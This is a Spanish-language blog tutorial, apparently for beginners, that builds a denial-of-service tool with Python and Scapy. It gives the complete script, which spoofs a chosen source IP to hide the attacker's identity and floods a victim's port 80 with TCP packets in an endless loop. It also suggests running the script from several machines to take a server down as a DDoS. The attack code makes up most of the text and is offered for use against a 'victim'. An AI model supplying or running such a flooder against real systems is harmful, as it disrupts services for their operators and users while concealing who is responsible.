Creando una sencilla tool de Dos en python-


    Luego de un tiempo sin publicar nada hoy les traigo algo muy sencillo y interesante. Usaremos uno de los lenguajes mas usados en el mundo de el pentesting y la programación  debido a su sencilla sintaxis la cual es muy fácil de entender. Bien para comenzar crearemos una herramienta de Dos ( Denegación de servicio) muy sencilla, esto nos servirá para entender como funciona este tipo de ataque.


Primero vamos a nuestra terminal y instalamos los paquetes de Scapy, esta librería es muy usada para el envío de paquetes, puertos, ip, protocolos TCP/UDP y entre otras muchas cosas .

> pip install scapy

Abrimos nuestro editor de texto en mi caso usare Sublime text.

En la primera linea importamos todos los paquetes de Scapy.


 from scapy.all import *

Luego declararemos 3 variables, La primera será la ip que usaremos para ocultar nuestra identidad luego la ip de la víctima, la variable de la cantidad de paquetes y por ultimo el puerto que atacaremos.

src = raw_input("ip de donde proviene el ataque: ")
victima = raw_input("ingrese ip de la victima: ")
puerto_ataque = int(raw_input("ingresa el puerto: "))
numero_paquete = 1

Debe quedar como el código anterior. Ahora creamos un bucle infinito el cual estará haciendo una petición al servidor o a nuestra víctima.

while True:
    IP1 = IP(src=src, dst=victima)
    TCP1 = TCP(sport=puerto_ataque,dport=80)
    pkt = IP1 / TCP1
    send(pkt,inter = .001)
    print "Paquete enviado numero: ", numero_paquete
    numero_paquete=numero_paquete+1

Lo que hicimos fue crear un bucle el cual enviara un paquete a nuestra víctima, una vez lo envié volvera a repetir el mismo proceso una y otra vez del envío de paquetes hasta que la víctima ya no pueda resolver mas peticiones, eso dependerá de la cantidad de paquetes enviados pero como solo estamos haciendo un Dos esto no suele afectar si solo es un atacante. Si corremos este script en mas de 5 maquinas y todas están atacando el mismo objetivo entonces podríamos lograr saturar el servidor y hacer que caiga pero ya eso seria un Ddos.

Codigo completo:

#! /usr/bin/python

from scapy.all import *

src=raw_input("ip de donde proviene el ataque: ")
victima=raw_input("ingrese ip de la victima: ")
puerto_ataque=int(raw_input("ingresa el puerto: "))

numero_paquete = 1

while True:
    IP1 = IP(src=src, dst=victima)
    TCP1 = TCP(sport=puerto_ataque,dport=80)
    pkt = IP1 / TCP1
    send(pkt,inter = .001)
    print "Paquete enviado numero: ", numero_paquete
    numero_paquete=numero_paquete+1


Espero que les haya gustado no olviden compartir.


0 Comments